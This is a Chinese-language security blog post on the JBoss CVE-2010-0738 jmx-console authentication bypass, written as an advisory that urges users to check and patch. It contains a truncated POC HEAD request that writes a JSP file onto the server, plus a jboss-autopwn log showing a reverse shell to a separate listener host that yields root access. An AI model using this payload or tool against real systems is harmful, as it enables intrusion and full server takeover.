刚休假回来，就看到JBOSS爆出的这个漏洞，不过redhat官方已经patch了。很奇怪国内没人关注？

在Redhat 的bugzilla上看到是3月16号报告的，4月27号订正

 实际上讲的是一个JBoss 的认证绕过漏洞，分析和POC在这里：

Good Bye Critical Jboss 0day

需要***

简单来说，就是因为JBOSS在配置HTTP verbs的时候，访问控制的实现有问题，导致如 HEAD等未在配置文件中允许的verb能够直接以 jbossadmin 身份调用 GET handler, 从而绕过认证。

POC如下：

HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=6&arg0=..%2Fjmx-console.war%2F&arg1=ikki&arg2=.jsp&arg3=%3C%25%40+page+import%3D%22java.io.*….... HTTP/1.1

在Blackhat 2010 Europe 上发布的工具 jboss-autopwn，已经能够直接支持这个漏洞的调用了。

有人回帖给出了如下贴图：
[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]# 

这个漏洞非常严重，因为是默认配置就存在的，受影响的版本建议自查一下。